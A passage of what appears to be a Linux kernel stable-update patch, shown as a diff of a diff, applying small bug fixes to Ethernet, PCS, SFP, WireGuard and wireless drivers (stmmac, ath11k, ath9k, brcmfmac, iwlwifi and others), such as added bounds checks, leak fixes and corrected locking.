+ 	int ret;
+ 
++	ret = pm_runtime_resume_and_get(priv->device);
++	if (ret < 0)
++		return ret;
++
+ 	if (be16_to_cpu(proto) == ETH_P_8021AD)
+ 		is_double = true;
+ 
+@@ -6353,16 +6357,18 @@ static int stmmac_vlan_rx_add_vid(struct net_device *ndev, __be16 proto, u16 vid
+ 	ret = stmmac_vlan_update(priv, is_double);
+ 	if (ret) {
+ 		clear_bit(vid, priv->active_vlans);
+-		return ret;
++		goto err_pm_put;
+ 	}
+ 
+ 	if (priv->hw->num_vlan) {
+ 		ret = stmmac_add_hw_vlan_rx_fltr(priv, ndev, priv->hw, proto, vid);
+ 		if (ret)
+-			return ret;
++			goto err_pm_put;
+ 	}
++err_pm_put:
++	pm_runtime_put(priv->device);
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ static int stmmac_vlan_rx_kill_vid(struct net_device *ndev, __be16 proto, u16 vid)
+diff --git a/drivers/net/ethernet/sun/sunhme.c b/drivers/net/ethernet/sun/sunhme.c
+index b0c7ab74a82ed..7cf8210ebbec3 100644
+--- a/drivers/net/ethernet/sun/sunhme.c
++++ b/drivers/net/ethernet/sun/sunhme.c
+@@ -2834,7 +2834,7 @@ static int happy_meal_pci_probe(struct pci_dev *pdev,
+ 	int i, qfe_slot = -1;
+ 	char prom_name[64];
+ 	u8 addr[ETH_ALEN];
+-	int err;
++	int err = -ENODEV;
+ 
+ 	/* Now make sure pci_dev cookie is there. */
+ #ifdef CONFIG_SPARC
+diff --git a/drivers/net/pcs/pcs-xpcs.c b/drivers/net/pcs/pcs-xpcs.c
+index 70f88eae2a9e0..dd88624593c71 100644
+--- a/drivers/net/pcs/pcs-xpcs.c
++++ b/drivers/net/pcs/pcs-xpcs.c
+@@ -329,7 +329,7 @@ static int xpcs_read_fault_c73(struct dw_xpcs *xpcs,
+ 	return 0;
+ }
+ 
+-static int xpcs_read_link_c73(struct dw_xpcs *xpcs, bool an)
++static int xpcs_read_link_c73(struct dw_xpcs *xpcs)
+ {
+ 	bool link = true;
+ 	int ret;
+@@ -341,15 +341,6 @@ static int xpcs_read_link_c73(struct dw_xpcs *xpcs, bool an)
+ 	if (!(ret & MDIO_STAT1_LSTATUS))
+ 		link = false;
+ 
+-	if (an) {
+-		ret = xpcs_read(xpcs, MDIO_MMD_AN, MDIO_STAT1);
+-		if (ret < 0)
+-			return ret;
+-
+-		if (!(ret & MDIO_STAT1_LSTATUS))
+-			link = false;
+-	}
+-
+ 	return link;
+ }
+ 
+@@ -943,7 +934,7 @@ static int xpcs_get_state_c73(struct dw_xpcs *xpcs,
+ 	int ret;
+ 
+ 	/* Link needs to be read first ... */
+-	state->link = xpcs_read_link_c73(xpcs, state->an_enabled) > 0 ? 1 : 0;
++	state->link = xpcs_read_link_c73(xpcs) > 0 ? 1 : 0;
+ 
+ 	/* ... and then we check the faults. */
+ 	ret = xpcs_read_fault_c73(xpcs, state);
+diff --git a/drivers/net/phy/sfp.c b/drivers/net/phy/sfp.c
+index 5663a184644d5..766f86bdc4a09 100644
+--- a/drivers/net/phy/sfp.c
++++ b/drivers/net/phy/sfp.c
+@@ -395,6 +395,10 @@ static const struct sfp_quirk sfp_quirks[] = {
+ 
+ 	SFP_QUIRK_F("HALNy", "HL-GSFP", sfp_fixup_halny_gsfp),
+ 
++	// HG MXPD-483II-F 2.5G supports 2500Base-X, but incorrectly reports
++	// 2600MBd in their EERPOM
++	SFP_QUIRK_M("HG GENUINE", "MXPD-483II", sfp_quirk_2500basex),
++
+ 	// Huawei MA5671A can operate at 2500base-X, but report 1.2GBd NRZ in
+ 	// their EEPROM
+ 	SFP_QUIRK("HUAWEI", "MA5671A", sfp_quirk_2500basex,
+diff --git a/drivers/net/wireguard/timers.c b/drivers/net/wireguard/timers.c
+index d54d32ac9bc41..91f5d6d2d4e2d 100644
+--- a/drivers/net/wireguard/timers.c
++++ b/drivers/net/wireguard/timers.c
+@@ -46,7 +46,7 @@ static void wg_expired_retransmit_handshake(struct timer_list *timer)
+ 	if (peer->timer_handshake_attempts > MAX_TIMER_HANDSHAKES) {
+ 		pr_debug("%s: Handshake for peer %llu (%pISpfsc) did not complete after %d attempts, giving up\n",
+ 			 peer->device->dev->name, peer->internal_id,
+-			 &peer->endpoint.addr, MAX_TIMER_HANDSHAKES + 2);
++			 &peer->endpoint.addr, (int)MAX_TIMER_HANDSHAKES + 2);
+ 
+ 		del_timer(&peer->timer_send_keepalive);
+ 		/* We drop all packets without a keypair and don't try again,
+@@ -64,7 +64,7 @@ static void wg_expired_retransmit_handshake(struct timer_list *timer)
+ 		++peer->timer_handshake_attempts;
+ 		pr_debug("%s: Handshake for peer %llu (%pISpfsc) did not complete after %d seconds, retrying (try %d)\n",
+ 			 peer->device->dev->name, peer->internal_id,
+-			 &peer->endpoint.addr, REKEY_TIMEOUT,
++			 &peer->endpoint.addr, (int)REKEY_TIMEOUT,
+ 			 peer->timer_handshake_attempts + 1);
+ 
+ 		/* We clear the endpoint address src address, in case this is
+@@ -94,7 +94,7 @@ static void wg_expired_new_handshake(struct timer_list *timer)
+ 
+ 	pr_debug("%s: Retrying handshake with peer %llu (%pISpfsc) because we stopped hearing back after %d seconds\n",
+ 		 peer->device->dev->name, peer->internal_id,
+-		 &peer->endpoint.addr, KEEPALIVE_TIMEOUT + REKEY_TIMEOUT);
++		 &peer->endpoint.addr, (int)(KEEPALIVE_TIMEOUT + REKEY_TIMEOUT));
+ 	/* We clear the endpoint address src address, in case this is the cause
+ 	 * of trouble.
+ 	 */
+@@ -126,7 +126,7 @@ static void wg_queued_expired_zero_key_material(struct work_struct *work)
+ 
+ 	pr_debug("%s: Zeroing out all keys for peer %llu (%pISpfsc), since we haven't received a new one in %d seconds\n",
+ 		 peer->device->dev->name, peer->internal_id,
+-		 &peer->endpoint.addr, REJECT_AFTER_TIME * 3);
++		 &peer->endpoint.addr, (int)REJECT_AFTER_TIME * 3);
+ 	wg_noise_handshake_clear(&peer->handshake);
+ 	wg_noise_keypairs_clear(&peer->keypairs);
+ 	wg_peer_put(peer);
+diff --git a/drivers/net/wireless/ath/ath11k/ahb.c b/drivers/net/wireless/ath/ath11k/ahb.c
+index d34a4d6325b2b..76f275ca53e9c 100644
+--- a/drivers/net/wireless/ath/ath11k/ahb.c
++++ b/drivers/net/wireless/ath/ath11k/ahb.c
+@@ -859,11 +859,11 @@ static int ath11k_ahb_setup_msi_resources(struct ath11k_base *ab)
+ 	ab->pci.msi.ep_base_data = int_prop + 32;
+ 
+ 	for (i = 0; i < ab->pci.msi.config->total_vectors; i++) {
+-		res = platform_get_resource(pdev, IORESOURCE_IRQ, i);
+-		if (!res)
+-			return -ENODEV;
++		ret = platform_get_irq(pdev, i);
++		if (ret < 0)
++			return ret;
+ 
+-		ab->pci.msi.irqs[i] = res->start;
++		ab->pci.msi.irqs[i] = ret;
+ 	}
+ 
+ 	set_bit(ATH11K_FLAG_MULTI_MSI_VECTORS, &ab->dev_flags);
+@@ -1063,6 +1063,12 @@ static int ath11k_ahb_fw_resource_deinit(struct ath11k_base *ab)
+ 	struct iommu_domain *iommu;
+ 	size_t unmapped_size;
+ 
++	/* Chipsets not requiring MSA would have not initialized
++	 * MSA resources, return success in such cases.
++	 */
++	if (!ab->hw_params.fixed_fw_mem)
++		return 0;
++
+ 	if (ab_ahb->fw.use_tz)
+ 		return 0;
+ 
+diff --git a/drivers/net/wireless/ath/ath11k/dbring.c b/drivers/net/wireless/ath/ath11k/dbring.c
+index 2107ec05d14fd..5536e86423312 100644
+--- a/drivers/net/wireless/ath/ath11k/dbring.c
++++ b/drivers/net/wireless/ath/ath11k/dbring.c
+@@ -26,13 +26,13 @@ int ath11k_dbring_validate_buffer(struct ath11k *ar, void *buffer, u32 size)
+ static void ath11k_dbring_fill_magic_value(struct ath11k *ar,
+ 					   void *buffer, u32 size)
+ {
+-	u32 *temp;
+-	int idx;
+-
+-	size = size >> 2;
++	/* memset32 function fills buffer payload with the ATH11K_DB_MAGIC_VALUE
++	 * and the variable size is expected to be the number of u32 values
++	 * to be stored, not the number of bytes.
++	 */
++	size = size / sizeof(u32);
+ 
+-	for (idx = 0, temp = buffer; idx < size; idx++, temp++)
+-		*temp++ = ATH11K_DB_MAGIC_VALUE;
++	memset32(buffer, ATH11K_DB_MAGIC_VALUE, size);
+ }
+ 
+ static int ath11k_dbring_bufs_replenish(struct ath11k *ar,
+diff --git a/drivers/net/wireless/ath/ath11k/mac.h b/drivers/net/wireless/ath/ath11k/mac.h
+index 2a0d3afb0c993..0231783ad754b 100644
+--- a/drivers/net/wireless/ath/ath11k/mac.h
++++ b/drivers/net/wireless/ath/ath11k/mac.h
+@@ -163,7 +163,7 @@ void ath11k_mac_drain_tx(struct ath11k *ar);
+ void ath11k_mac_peer_cleanup_all(struct ath11k *ar);
+ int ath11k_mac_tx_mgmt_pending_free(int buf_id, void *skb, void *ctx);
+ u8 ath11k_mac_bw_to_mac80211_bw(u8 bw);
+-u32 ath11k_mac_he_gi_to_nl80211_he_gi(u8 sgi);
++enum nl80211_he_gi ath11k_mac_he_gi_to_nl80211_he_gi(u8 sgi);
+ enum nl80211_he_ru_alloc ath11k_mac_phy_he_ru_to_nl80211_he_ru_alloc(u16 ru_phy);
+ enum nl80211_he_ru_alloc ath11k_mac_he_ru_tones_to_nl80211_he_ru_alloc(u16 ru_tones);
+ enum ath11k_supported_bw ath11k_mac_mac80211_bw_to_ath11k_bw(enum rate_info_bw bw);
+diff --git a/drivers/net/wireless/ath/ath11k/mhi.c b/drivers/net/wireless/ath/ath11k/mhi.c
+index 86995e8dc9135..a62ee05c54097 100644
+--- a/drivers/net/wireless/ath/ath11k/mhi.c
++++ b/drivers/net/wireless/ath/ath11k/mhi.c
+@@ -16,7 +16,7 @@
+ #include "pci.h"
+ #include "pcic.h"
+ 
+-#define MHI_TIMEOUT_DEFAULT_MS	90000
++#define MHI_TIMEOUT_DEFAULT_MS	20000
+ #define RDDM_DUMP_SIZE	0x420000
+ 
+ static struct mhi_channel_config ath11k_mhi_channels_qca6390[] = {
+diff --git a/drivers/net/wireless/ath/ath11k/peer.c b/drivers/net/wireless/ath/ath11k/peer.c
+index 1ae7af02c364e..1380811827a84 100644
+--- a/drivers/net/wireless/ath/ath11k/peer.c
++++ b/drivers/net/wireless/ath/ath11k/peer.c
+@@ -382,22 +382,23 @@ int ath11k_peer_create(struct ath11k *ar, struct ath11k_vif *arvif,
+ 		return -ENOBUFS;
+ 	}
+ 
++	mutex_lock(&ar->ab->tbl_mtx_lock);
+ 	spin_lock_bh(&ar->ab->base_lock);
+ 	peer = ath11k_peer_find_by_addr(ar->ab, param->peer_addr);
+ 	if (peer) {
+ 		if (peer->vdev_id == param->vdev_id) {
+ 			spin_unlock_bh(&ar->ab->base_lock);
++			mutex_unlock(&ar->ab->tbl_mtx_lock);
+ 			return -EINVAL;
+ 		}
+ 
+ 		/* Assume sta is transitioning to another band.
+ 		 * Remove here the peer from rhash.
+ 		 */
+-		mutex_lock(&ar->ab->tbl_mtx_lock);
+ 		ath11k_peer_rhash_delete(ar->ab, peer);
+-		mutex_unlock(&ar->ab->tbl_mtx_lock);
+ 	}
+ 	spin_unlock_bh(&ar->ab->base_lock);
++	mutex_unlock(&ar->ab->tbl_mtx_lock);
+ 
+ 	ret = ath11k_wmi_send_peer_create_cmd(ar, param);
+ 	if (ret) {
+diff --git a/drivers/net/wireless/ath/ath5k/ahb.c b/drivers/net/wireless/ath/ath5k/ahb.c
+index 2c9cec8b53d9e..28a1e5eff204e 100644
+--- a/drivers/net/wireless/ath/ath5k/ahb.c
++++ b/drivers/net/wireless/ath/ath5k/ahb.c
+@@ -113,15 +113,13 @@ static int ath_ahb_probe(struct platform_device *pdev)
+ 		goto err_out;
+ 	}
+ 
+-	res = platform_get_resource(pdev, IORESOURCE_IRQ, 0);
+-	if (res == NULL) {
+-		dev_err(&pdev->dev, "no IRQ resource found\n");
+-		ret = -ENXIO;
++	irq = platform_get_irq(pdev, 0);
++	if (irq < 0) {
++		dev_err(&pdev->dev, "no IRQ resource found: %d\n", irq);
++		ret = irq;
+ 		goto err_iounmap;
+ 	}
+ 
+-	irq = res->start;
+-
+ 	hw = ieee80211_alloc_hw(sizeof(struct ath5k_hw), &ath5k_hw_ops);
+ 	if (hw == NULL) {
+ 		dev_err(&pdev->dev, "no memory for ieee80211_hw\n");
+diff --git a/drivers/net/wireless/ath/ath5k/eeprom.c b/drivers/net/wireless/ath/ath5k/eeprom.c
+index d444b3d70ba2e..58d3e86f6256d 100644
+--- a/drivers/net/wireless/ath/ath5k/eeprom.c
++++ b/drivers/net/wireless/ath/ath5k/eeprom.c
+@@ -529,7 +529,7 @@ ath5k_eeprom_read_freq_list(struct ath5k_hw *ah, int *offset, int max,
+ 		ee->ee_n_piers[mode]++;
+ 
+ 		freq2 = (val >> 8) & 0xff;
+-		if (!freq2)
++		if (!freq2 || i >= max)
+ 			break;
+ 
+ 		pc[i++].freq = ath5k_eeprom_bin2freq(ee,
+diff --git a/drivers/net/wireless/ath/ath6kl/bmi.c b/drivers/net/wireless/ath/ath6kl/bmi.c
+index bde5a10d470c8..af98e871199d3 100644
+--- a/drivers/net/wireless/ath/ath6kl/bmi.c
++++ b/drivers/net/wireless/ath/ath6kl/bmi.c
+@@ -246,7 +246,7 @@ int ath6kl_bmi_execute(struct ath6kl *ar, u32 addr, u32 *param)
+ 		return -EACCES;
+ 	}
+ 
+-	size = sizeof(cid) + sizeof(addr) + sizeof(param);
++	size = sizeof(cid) + sizeof(addr) + sizeof(*param);
+ 	if (size > ar->bmi.max_cmd_size) {
+ 		WARN_ON(1);
+ 		return -EINVAL;
+diff --git a/drivers/net/wireless/ath/ath6kl/htc_pipe.c b/drivers/net/wireless/ath/ath6kl/htc_pipe.c
+index c68848819a52d..9b88d96bfe96c 100644
+--- a/drivers/net/wireless/ath/ath6kl/htc_pipe.c
++++ b/drivers/net/wireless/ath/ath6kl/htc_pipe.c
+@@ -960,8 +960,8 @@ static int ath6kl_htc_pipe_rx_complete(struct ath6kl *ar, struct sk_buff *skb,
+ 	 * Thus the possibility of ar->htc_target being NULL
+ 	 * via ath6kl_recv_complete -> ath6kl_usb_io_comp_work.
+ 	 */
+-	if (WARN_ON_ONCE(!target)) {
+-		ath6kl_err("Target not yet initialized\n");
++	if (!target) {
++		ath6kl_dbg(ATH6KL_DBG_HTC, "Target not yet initialized\n");
+ 		status = -EINVAL;
+ 		goto free_skb;
+ 	}
+diff --git a/drivers/net/wireless/ath/ath9k/hif_usb.c b/drivers/net/wireless/ath/ath9k/hif_usb.c
+index f521dfa2f1945..e0130beb304df 100644
+--- a/drivers/net/wireless/ath/ath9k/hif_usb.c
++++ b/drivers/net/wireless/ath/ath9k/hif_usb.c
+@@ -534,6 +534,24 @@ static struct ath9k_htc_hif hif_usb = {
+ 	.send = hif_usb_send,
+ };
+ 
++/* Need to free remain_skb allocated in ath9k_hif_usb_rx_stream
++ * in case ath9k_hif_usb_rx_stream wasn't called next time to
++ * process the buffer and subsequently free it.
++ */
++static void ath9k_hif_usb_free_rx_remain_skb(struct hif_device_usb *hif_dev)
++{
++	unsigned long flags;
++
++	spin_lock_irqsave(&hif_dev->rx_lock, flags);
++	if (hif_dev->remain_skb) {
++		dev_kfree_skb_any(hif_dev->remain_skb);
++		hif_dev->remain_skb = NULL;
++		hif_dev->rx_remain_len = 0;
++		RX_STAT_INC(hif_dev, skb_dropped);
++	}
++	spin_unlock_irqrestore(&hif_dev->rx_lock, flags);
++}
++
+ static void ath9k_hif_usb_rx_stream(struct hif_device_usb *hif_dev,
+ 				    struct sk_buff *skb)
+ {
+@@ -868,6 +886,7 @@ err:
+ static void ath9k_hif_usb_dealloc_rx_urbs(struct hif_device_usb *hif_dev)
+ {
+ 	usb_kill_anchored_urbs(&hif_dev->rx_submitted);
++	ath9k_hif_usb_free_rx_remain_skb(hif_dev);
+ }
+ 
+ static int ath9k_hif_usb_alloc_rx_urbs(struct hif_device_usb *hif_dev)
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+index 12c4408bbc3b6..2cc913acfc2d7 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+@@ -6210,18 +6210,20 @@ static s32 brcmf_notify_rssi(struct brcmf_if *ifp,
+ {
+ 	struct brcmf_cfg80211_vif *vif = ifp->vif;
+ 	struct brcmf_rssi_be *info = data;
+-	s32 rssi, snr, noise;
++	s32 rssi, snr = 0, noise = 0;
+ 	s32 low, high, last;
+ 
+-	if (e->datalen < sizeof(*info)) {
++	if (e->datalen >= sizeof(*info)) {
++		rssi = be32_to_cpu(info->rssi);
++		snr = be32_to_cpu(info->snr);
++		noise = be32_to_cpu(info->noise);
++	} else if (e->datalen >= sizeof(rssi)) {
++		rssi = be32_to_cpu(*(__be32 *)data);
++	} else {
+ 		brcmf_err("insufficient RSSI event data\n");
+ 		return 0;
+ 	}
+ 
+-	rssi = be32_to_cpu(info->rssi);
+-	snr = be32_to_cpu(info->snr);
+-	noise = be32_to_cpu(info->noise);
+-
+ 	low = vif->cqm_rssi_low;
+ 	high = vif->cqm_rssi_high;
+ 	last = vif->cqm_rssi_last;
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/dbg.c b/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
+index abf49022edbe4..027360e63b926 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
+@@ -1038,7 +1038,7 @@ iwl_dump_ini_prph_mac_iter(struct iwl_fw_runtime *fwrt,
+ 	range->range_data_size = reg->dev_addr.size;
+ 	for (i = 0; i < le32_to_cpu(reg->dev_addr.size); i += 4) {
+ 		prph_val = iwl_read_prph(fwrt->trans, addr + i);
+-		if (prph_val == 0x5a5a5a5a)
++		if ((prph_val & ~0xf) == 0xa5a5a5a0)
+ 			return -EBUSY;
+ 		*val++ = cpu_to_le32(prph_val);
+ 	}
+@@ -1388,13 +1388,13 @@ static void iwl_ini_get_rxf_data(struct iwl_fw_runtime *fwrt,
+ 	if (!data)
+ 		return;
+ 
++	memset(data, 0, sizeof(*data));
++
+ 	/* make sure only one bit is set in only one fid */
+ 	if (WARN_ONCE(hweight_long(fid1) + hweight_long(fid2) != 1,
+ 		      "fid1=%x, fid2=%x\n", fid1, fid2))
+ 		return;
+ 
+-	memset(data, 0, sizeof(*data));
+-
+ 	if (fid1) {
+ 		fifo_idx = ffs(fid1) - 1;
+ 		if (WARN_ONCE(fifo_idx >= MAX_NUM_LMAC, "fifo_idx=%d\n",
+@@ -1562,7 +1562,7 @@ iwl_dump_ini_dbgi_sram_iter(struct iwl_fw_runtime *fwrt,
+ 		prph_data = iwl_read_prph_no_grab(fwrt->trans, (i % 2) ?
+ 					  DBGI_SRAM_TARGET_ACCESS_RDATA_MSB :
+ 					  DBGI_SRAM_TARGET_ACCESS_RDATA_LSB);
+-		if (prph_data == 0x5a5a5a5a) {
++		if ((prph_data & ~0xf) == 0xa5a5a5a0) {
+ 			iwl_trans_release_nic_access(fwrt->trans);
+ 			return -EBUSY;
+ 		}
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c b/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
+index 43e997283db0f..607e07ed2477c 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
+@@ -317,8 +317,10 @@ static void *iwl_dbgfs_fw_info_seq_next(struct seq_file *seq,
+ 	const struct iwl_fw *fw = priv->fwrt->fw;
+ 
+ 	*pos = ++state->pos;
+-	if (*pos >= fw->ucode_capa.n_cmd_versions)
++	if (*pos >= fw->ucode_capa.n_cmd_versions) {
++		kfree(state);
+ 		return NULL;
++	}
+ 
+ 	return state;
+ }
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c b/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
+index 3237d4b528b5d..a1d34f3e7a9f4 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
+@@ -138,6 +138,12 @@ static int iwl_dbg_tlv_alloc_buf_alloc(struct iwl_trans *trans,
+ 	    alloc_id != IWL_FW_INI_ALLOCATION_ID_DBGC1)
+ 		goto err;
+ 
++	if (buf_location == IWL_FW_INI_LOCATION_DRAM_PATH &&
++	    alloc->req_size == 0) {
++		IWL_ERR(trans, "WRT: Invalid DRAM buffer allocation requested size (0)\n");
++		return -EINVAL;
++	}
++
+ 	trans->dbg.fw_mon_cfg[alloc_id] = *alloc;
+ 
+ 	return 0;
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-debug.c b/drivers/net/wireless/intel/iwlwifi/iwl-debug.c
+index ae4c2a3d63d5b..3a3c13a41fc61 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-debug.c
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-debug.c
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause
+ /*
+- * Copyright (C) 2005-2011, 2021 Intel Corporation
++ * Copyright (C) 2005-2011, 2021-2022 Intel Corporation
+  */
+ #include <linux/device.h>
+ #include <linux/interrupt.h>
+@@ -57,6 +57,7 @@ void __iwl_err(struct device *dev, enum iwl_err_mode mode, const char *fmt, ...)
+ 	default:
+ 		break;
+ 	}
++	vaf.va = &args;
+ 	trace_iwlwifi_err(&vaf);
+ 	va_end(args);
+ }
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+index 919b1f478b4ce..bbdda3e1ff3fc 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+@@ -563,6 +563,7 @@ static void iwl_mvm_wowlan_get_tkip_data(struct ieee80211_hw *hw,
+ 		}
+ 
+ 		for (i = 0; i < IWL_NUM_RSC; i++) {
++			ieee80211_get_key_rx_seq(key, i, &seq);
+ 			/* wrapping isn't allowed, AP must rekey */
+ 			if (seq.tkip.iv32 > cur_rx_iv32)
+ 				cur_rx_iv32 = seq.tkip.iv32;
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/debugfs.c b/drivers/net/wireless/intel/iwlwifi/mvm/debugfs.c
+index 1e8123140973e..022ec7ec0a2f1 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/debugfs.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/debugfs.c
+@@ -1745,6 +1745,11 @@ static ssize_t iwl_dbgfs_mem_read(struct file *file, char __user *user_buf,
+ 	if (ret < 0)
+ 		return ret;
+ 
++	if (iwl_rx_packet_payload_len(hcmd.resp_pkt) < sizeof(*rsp)) {
++		ret = -EIO;
++		goto out;
++	}
++
+ 	rsp = (void *)hcmd.resp_pkt->data;
+ 	if (le32_to_cpu(rsp->status) != DEBUG_MEM_STATUS_SUCCESS) {
+ 		ret = -ENXIO;
+@@ -1821,6 +1826,11 @@ static ssize_t iwl_dbgfs_mem_write(struct file *file,
+ 	if (ret < 0)
+ 		return ret;
+ 
++	if (iwl_rx_packet_payload_len(hcmd.resp_pkt) < sizeof(*rsp)) {
++		ret = -EIO;
++		goto out;
++	}
++
+ 	rsp = (void *)hcmd.resp_pkt->data;
+ 	if (rsp->status != DEBUG_MEM_STATUS_SUCCESS) {
+ 		ret = -ENXIO;
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/rx.c b/drivers/net/wireless/intel/iwlwifi/mvm/rx.c
+index 49ca1e168fc5b..eee98cebbb46a 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/rx.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/rx.c
+@@ -384,9 +384,10 @@ void iwl_mvm_rx_rx_mpdu(struct iwl_mvm *mvm, struct napi_struct *napi,
+ 		 * Don't even try to decrypt a MCAST frame that was received
+ 		 * before the managed vif is authorized, we'd fail anyway.
+ 		 */
+-		if (vif->type == NL80211_IFTYPE_STATION &&
++		if (is_multicast_ether_addr(hdr->addr1) &&
++		    vif->type == NL80211_IFTYPE_STATION &&
+ 		    !mvmvif->authorized &&
+-		    is_multicast_ether_addr(hdr->addr1)) {
++		    ieee80211_has_protected(hdr->frame_control)) {
+ 			IWL_DEBUG_DROP(mvm, "MCAST before the vif is authorized\n");
+ 			kfree_skb(skb);
+ 			rcu_read_unlock();
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c b/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
+index 1aadccd8841fd..091225894037c 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
+@@ -193,8 +193,7 @@ static int iwl_mvm_create_skb(struct iwl_mvm *mvm, struct sk_buff *skb,
+ 	 * Starting from Bz hardware, it calculates starting directly after
+ 	 * the MAC header, so that matches mac80211's expectation.
+ 	 */
+-	if (skb->ip_summed == CHECKSUM_COMPLETE &&
+-	    mvm->trans->trans_cfg->device_family < IWL_DEVICE_FAMILY_BZ) {
++	if (skb->ip_summed == CHECKSUM_COMPLETE) {
+ 		struct {
+ 			u8 hdr[6];
+ 			__be16 type;
+@@ -209,7 +208,7 @@ static int iwl_mvm_create_skb(struct iwl_mvm *mvm, struct sk_buff *skb,
+ 			      shdr->type != htons(ETH_P_PAE) &&
+ 			      shdr->type != htons(ETH_P_TDLS))))
+ 			skb->ip_summed = CHECKSUM_NONE;
+-		else
++		else if (mvm->trans->trans_cfg->device_family < IWL_DEVICE_FAMILY_BZ)
+ 			/* mac80211 assumes full CSUM including SNAP header */
+ 			skb_postpush_rcsum(skb, shdr, sizeof(*shdr));
+ 	}
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+index 4f699862e7f73..85fadd1ef1ff3 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+@@ -565,7 +565,6 @@ static const struct iwl_dev_info iwl_dev_info_table[] = {
+ 	IWL_DEV_INFO(0x43F0, 0x1652, killer1650i_2ax_cfg_qu_b0_hr_b0, iwl_ax201_killer_1650i_name),
+ 	IWL_DEV_INFO(0x43F0, 0x2074, iwl_ax201_cfg_qu_hr, NULL),
+ 	IWL_DEV_INFO(0x43F0, 0x4070, iwl_ax201_cfg_qu_hr, NULL),
+-	IWL_DEV_INFO(0x43F0, 0x1651, killer1650s_2ax_cfg_qu_b0_hr_b0, iwl_ax201_killer_1650s_name),
+ 	IWL_DEV_INFO(0xA0F0, 0x0070, iwl_ax201_cfg_qu_hr, NULL),
+ 	IWL_DEV_INFO(0xA0F0, 0x0074, iwl_ax201_cfg_qu_hr, NULL),
+ 	IWL_DEV_INFO(0xA0F0, 0x0078, iwl_ax201_cfg_qu_hr, NULL),
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+index bd50f52a1aade..54f11f60f11c4 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+@@ -599,7 +599,6 @@ static int iwl_pcie_set_hw_ready(struct iwl_trans *trans)
+ int iwl_pcie_prepare_card_hw(struct iwl_trans *trans)
+ {
+ 	int ret;
+-	int t = 0;
+ 	int iter;
+ 
+ 	IWL_DEBUG_INFO(trans, "iwl_trans_prepare_card_hw enter\n");
+@@ -616,6 +615,8 @@ int iwl_pcie_prepare_card_hw(struct iwl_trans *trans)
+ 	usleep_range(1000, 2000);
+ 
+ 	for (iter = 0; iter < 10; iter++) {
++		int t = 0;
++
+ 		/* If HW is not ready, prepare the conditions to check again */
+ 		iwl_set_bit(trans, CSR_HW_IF_CONFIG_REG,
+ 			    CSR_HW_IF_CONFIG_REG_PREPARE);
+@@ -1522,19 +1523,16 @@ static int iwl_pcie_d3_handshake(struct iwl_trans *trans, bool suspend)
+ 	struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans);
+ 	int ret;
+ 
+-	if (trans->trans_cfg->device_family == IWL_DEVICE_FAMILY_AX210) {
++	if (trans->trans_cfg->device_family == IWL_DEVICE_FAMILY_AX210)
+ 		iwl_write_umac_prph(trans, UREG_DOORBELL_TO_ISR6,
+ 				    suspend ? UREG_DOORBELL_TO_ISR6_SUSPEND :
+ 					      UREG_DOORBELL_TO_ISR6_RESUME);
+-	} else if (trans->trans_cfg->device_family >= IWL_DEVICE_FAMILY_BZ) {
++	else if (trans->trans_cfg->device_family >= IWL_DEVICE_FAMILY_BZ)
+ 		iwl_write32(trans, CSR_IPC_SLEEP_CONTROL,
+ 			    suspend ? CSR_IPC_SLEEP_CONTROL_SUSPEND :
+ 				      CSR_IPC_SLEEP_CONTROL_RESUME);
+-		iwl_write_umac_prph(trans, UREG_DOORBELL_TO_ISR6,
+-				    UREG_DOORBELL_TO_ISR6_SLEEP_CTRL);
+-	} else {
++	else
+ 		return 0;
+-	}
+ 
+ 	ret = wait_event_timeout(trans_pcie->sx_waitq,
+ 				 trans_pcie->sx_complete, 2 * HZ);
